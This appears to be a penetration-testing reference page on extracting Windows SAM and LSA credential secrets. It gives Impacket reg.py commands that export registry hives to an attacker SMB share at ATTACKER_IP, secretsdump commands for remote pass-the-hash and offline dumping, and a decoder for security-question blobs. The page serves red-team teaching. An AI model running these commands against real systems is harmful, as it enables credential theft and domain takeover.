
SAM & LSA secrets

Theory

In Windows environments, credentials are stored (mostly in hashed form) in registry hives such as SAM (Security Account Manager) and SECURITY.

| Hive | Details | Format or credential material |
|---|---|---|
| SAM | stores locally cached credentials (referred to as SAM secrets) | LM or NT hashes |
| SECURITY | stores domain cached credentials (referred to as LSA secrets) | Plaintext passwords, LM or NT hashes, Kerberos keys (DES, AES), Domain Cached Credentials (DCC1 and DCC2), Security Questions (L$_SQSA_<SID>) |
| SYSTEM | contains enough info to decrypt SAM secrets and LSA secrets | N/A |

SAM and LSA secrets can be dumped either locally or remotely from the mounted registry hives. These secrets can also be extracted offline from the exported hives. Once the secrets are extracted, they can be used for various attacks, depending on the credential format.

| Credential material | Subsequent attacks |
|---|---|
| Plaintext passwords | credential spraying, stuffing, shuffling or silver tickets |
| LM and NT hashes | credential spraying, stuffing, shuffling, cracking, pass-the-hash |
| Kerberos keys (RC4, i.e. == NT hash) | credential cracking, overpass-the-hash or silver tickets |
| Kerberos keys (DES, AES) | credential cracking, pass-the-key or silver tickets |
| Domain Cached Credentials (DCC1 or DCC2) | credential cracking |

Practice

Exfiltration

Impacket's reg.py (Python) script can be used to perform the same hive export remotely, from a UNIX-like machine. For instance, this can be used to easily escalate from a member of Backup Operators to Domain Admin by dumping a Domain Controller's secrets and using them for a DCSync.

The attacker can start an SMB server and specify a UNC path pointing to their own IP address, so that the hives get exported directly to that server.

```bash
# start an SMB share
smbserver.py -smb2support "someshare" "./"

# save each hive manually
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SAM' -o '\\ATTACKER_IP\someshare'
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SYSTEM' -o '\\ATTACKER_IP\someshare'
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SECURITY' -o '\\ATTACKER_IP\someshare'

# backup all SAM, SYSTEM and SECURITY hives at once
reg.py "domain"/"user":"password"@"target" backup -o '\\ATTACKER_IP\someshare'
```

Secrets dump

Here are some examples and tools that can be used for local/remote/offline dumping.

Impacket's secretsdump (Python) can be used to dump SAM and LSA secrets, either remotely or from local files. For remote dumping, several authentication methods can be used, such as pass-the-hash (LM/NTLM) or pass-the-ticket (Kerberos).

```bash
# Remote dumping of SAM & LSA secrets
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'

# Remote dumping of SAM & LSA secrets (pass-the-hash)
secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'

# Remote dumping of SAM & LSA secrets (pass-the-ticket)
secretsdump.py -k 'DOMAIN/USER@TARGET'

# Offline dumping of LSA secrets from exported hives
secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL

# Offline dumping of SAM secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL

# Offline dumping of SAM & LSA secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
```

Secretsdump (Impacket) and NetExec both extract security questions, if any, from the LSA. The blob is JSON, UTF-16-LE encoded, and then hex encoded on top of that, so it has to be decoded in that order to be read.
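The three decoding layers as an added, stand-alone example (not code from the page, Impacket or NetExec): the sample blob, its question/answer text and the JSON key names (`version`, `questions`, `question`, `answer`) are constructed assumptions for the demo; the decoder tolerates a UTF-16 BOM and a trailing NUL terminator.

```python
import binascii
import json

# Constructed sample of an L$_SQSA_<SID> blob as the dump tools print it:
# JSON -> UTF-16-LE -> hex. Text and key layout are made up for this demo.
SAMPLE_JSON = {
    "version": 1,
    "questions": [
        {"question": "What was your first pet's name?", "answer": "Rex"},
        {"question": "What city were you born in?", "answer": "Lyon"},
    ],
}
SAMPLE_HEX = json.dumps(SAMPLE_JSON, separators=(",", ":")).encode("utf-16-le").hex()


def decode_security_questions(hex_blob: str) -> dict:
    """Reverse the three layers: hex text -> bytes -> UTF-16-LE -> JSON.

    A leading UTF-16 BOM and trailing NUL terminators are stripped before
    parsing; truncated (odd-length) input is rejected instead of guessed.
    """
    cleaned = "".join(hex_blob.split())  # tolerate whitespace from copy/paste
    if len(cleaned) % 2:
        raise ValueError("hex blob has odd length; was it truncated?")
    raw = binascii.unhexlify(cleaned)
    if len(raw) % 2:
        raise ValueError("UTF-16-LE payload must have an even byte length")
    text = raw.decode("utf-16-le").lstrip("\ufeff").rstrip("\x00")
    return json.loads(text)


def question_pairs(hex_blob: str) -> list[tuple[str, str]]:
    """Return (question, answer) tuples in stored order (assumed key names)."""
    data = decode_security_questions(hex_blob)
    return [(q["question"], q["answer"]) for q in data.get("questions", [])]


if __name__ == "__main__":
    for question, answer in question_pairs(SAMPLE_HEX):
        print(f"{question!r} -> {answer!r}")
```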

Resources

http://moyix.blogspot.com/2008/02/syskey-and-sam.html

http://moyix.blogspot.com/2008/02/decrypting-lsa-secrets.html

https://medium.com/@benichmt1/secretsdump-demystified-bfd0f933dd9b

https://webstersprodigy.net/2014/02/03/mscash-hash-primer-for-pentesters/